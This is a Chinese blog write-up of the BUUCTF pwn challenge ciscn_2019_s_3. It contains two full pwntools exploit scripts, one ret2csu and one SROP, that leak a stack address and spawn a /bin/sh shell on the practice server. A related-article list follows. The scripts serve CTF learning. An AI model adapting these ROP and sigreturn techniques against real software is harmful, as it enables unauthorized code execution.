BUUCTF Pwn ciscn_2019_s_3 WP

最新推荐文章于 2025-01-14 15:54:48 发布
最新推荐文章于 2025-01-14 15:54:48 发布
阅读量312 收藏 9
点赞数 5
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/144955263
版权

1.下载文件 checksec 拖入exeinfo 

用patchelf切换libc和ld:


64位 拖入IDA64 查看main函数:

发现函数里有个gadgets函数,查看汇编:

将rax设为15 和 59 这两个分别是signreturn 和 execve的系统调用

所以有两种做法:ret2csu 和 SROP 

但是程序本身没有binsh字符串 所以两种方法都需要自己输入binsh并得到其地址:

需要先用调试查看偏移:

打印出来的栈地址

binsh的地址

相减可以得到偏移是0x138

payload = b'/bin/sh\x00' + b'a' * 8 + p64(main_addr)
p.send(payload)
p.recv(0x20)
stack_addr = u64(p.recv(8))
print(hex(stack_addr))
offset = 0x138

binsh_addr = stack_addr - offset
print(hex(binsh_addr))

gdb.attach(p)
pause()

1.ret2csu

找到csu_init的地址:

 要利用的就是这一块:

构造exp:

from pwn import *

p = process('./ciscn_s_3')
#p = remote("node5.buuoj.cn", 25414)
#elf = ELF('./ciscn_s_3')

p6r_addr = 0x40059A
movcall_addr = 0x400580
execv_addr = 0x4004e2
syscall_addr = 0x400517
rdi_addr = 0x4005a3
main_addr = 0x40051D

payload = b'/bin/sh\x00' + b'a' * 8 + p64(main_addr)
p.send(payload)
p.recv(0x20)
stack_addr = u64(p.recv(8))
print(hex(stack_addr))
offset = 0x138

binsh_addr = stack_addr - offset
print(hex(binsh_addr))

gdb.attach(p)
pause()

payload2 = b'/bin/sh\x00' + b'a' * 8 + p64(p6r_addr)
payload2 += p64(0) * 2 + p64(binsh_addr + 0x50) + p64(0) * 3
payload2 += p64(movcall_addr) + p64(execv_addr)
payload2 += p64(rdi_addr) + p64(binsh_addr) + p64(syscall_addr)

p.send(payload2)

p.interactive()

解释一下:

先传入binsh字符串及堆字符到rbp 然后调用csu里的pop一堆寄存器的gadgets

接着进行传参,rbx rbp设置为0 然后将r12设置为execv的地址(binsh地址+0x08 * 0x0A) ,再将后面几个寄存器设为0 

然后调用第二个gadgets 赋值给rdx和rsi

第二个gadgets有个call 第一次执行会跳转到r12 且前面已经将rbx设置为0,所以

第二个gadgets会再循环一次 此时rbx 等于 1 然后call指令就会跳转到r12 + 8的地址,也就是payload2中的pop rdi地址

然后传参binsh 以ret到系统调用结束

运行,得到flag:
 

2.SROP

学会了SigreturnFrame() 用法就能直接写出来 比用ret2csu方法方便

exp:

from pwn import *

#p = process('./ciscn_s_3')
context(arch='amd64', os='linux')
#一定要加上这句 否则会报错

p = remote("node5.buuoj.cn", 26367)
#elf = ELF('./ciscn_s_3')
sigreturn_addr = 0x4004DA
syscall_addr = 0x400517
main_addr = 0x40051D

payload = b'/bin/sh\x00' + b'a' * 8 + p64(main_addr)
p.send(payload)
p.recv(0x20)
stack_addr = u64(p.recv(8))
print(hex(stack_addr))
offset = 0x138
binsh_addr = stack_addr - offset
print(hex(binsh_addr))

#gdb.attach(p)
#pause()

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr

payload2 = b'/bin/sh\x00' + b'a' * 8 + p64(sigreturn_addr) + p64(syscall_addr) + bytes(frame)
p.send(payload2)
p.interactive()

运行 得到flag:

ciscn_2019_en_3
fayinq的博客
03-14 544
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 677
Buu CTF PWNciscn_2019_c_1的WriteUp
buuctf PWN ciscn_2019_c_1
wp568的博客
10-08 309
amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)->本函数地址 -> 返回地址。encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。
BUUCTF PWN wp--ciscn_2019_n_1
2302_81740139的博客
08-25 389
得到gets缓冲区的范围大小。用垃圾数据填充v1(如上图箭头为0x30+0x8),溢出v2,覆盖到下方的system函数,转换到cat/flag的地址0x4006BE。第二步 进入主函数,发现func,main函数调用了func,func中存在经典gets()漏洞,我们看到本题是v2数组在做比较。第一步 checksec,并检查该题的保护机制。第三步 编写脚本。
BUUCTF ciscn_2019_ne_5
2401_88087539的博客
01-14 424
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF ciscn_2019_c_1
2401_88087539的博客
01-07 321
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF-PWN】11-ciscn_2019_c_1
燕麦葡萄干的博客
07-05 1095
再利用pop_rdi;ret语句进行将下一层值推入寄存器rdi中作为参数,本次payload构建目的在于利用puts函数泄露本身的真实地址,从而获取Libc基址,所以将puts_got作为参数,运行函数地址为puts_plt,即用puts来打印出Puts_got的地址,最后再返回start函数重新运行,在后续中再次利用libc的基址找出system以及“bin/sh”的地址,从而构建第二次payload,要注意的是由于靶机是Ubuntu,所以要构建栈平衡,第二次payload需要加入ret。
PwnBUUCTF ciscn_2019_s_4 wp 栈迁移
Lcw_linyx的博客
05-20 650
个人日记= =,记录pwn自己的自闭过程
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 680
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 599
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2359
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
几道buuctf pwn wp
weixin_44113469的博客
02-07 418
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
buuctf习题pwn(51~60)
yw__y的博客
03-01 370
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
hi-z测试文件遮挡剔除
最新发布
05-16
hi-z测试文件遮挡剔除
毕业设计-喝酒-整站商业源码.zip
05-16
毕业设计-喝酒-整站商业源码.zip
生成对抗网络在计算机视觉领域的应用.pdf
05-16
生成对抗网络在计算机视觉领域的应用.pdf
光学仿真领域COMSOL远场偏振通用计算方法及Matlab辅助分析
05-16
内容概要:本文详细介绍了COMSOL在远场偏振通用计算中的应用,涵盖从建模到仿真的完整流程。首先解释了远场偏振的概念及其在光学模拟中的重要性,接着逐步讲解了如何在COMSOL中建立光学模型、划分网格、设置参数并运行仿真。随后,重点讨论了如何解读远场偏振图和能带结构图,最后介绍了如何使用Matlab程序读取COMSOL输出数据并进行进一步的分析和绘图。通过这些步骤,读者可以全面掌握COMSOL在远场偏振计算中的应用。 适合人群:从事光学仿真领域的研究人员和技术人员,尤其是那些希望深入了解COMSOL软件及其与Matlab集成使用的专业人士。 使用场景及目标:适用于需要进行复杂光学仿真和数据分析的研究项目,旨在提高对光波传播行为和材料特性的理解,促进相关领域的科研创新。 阅读建议:建议读者跟随文中提供的具体步骤进行实际操作练习,同时结合Matlab代码示例加深理解。对于初学者来说,可以从简单模型入手,逐渐过渡到更复杂的仿真任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值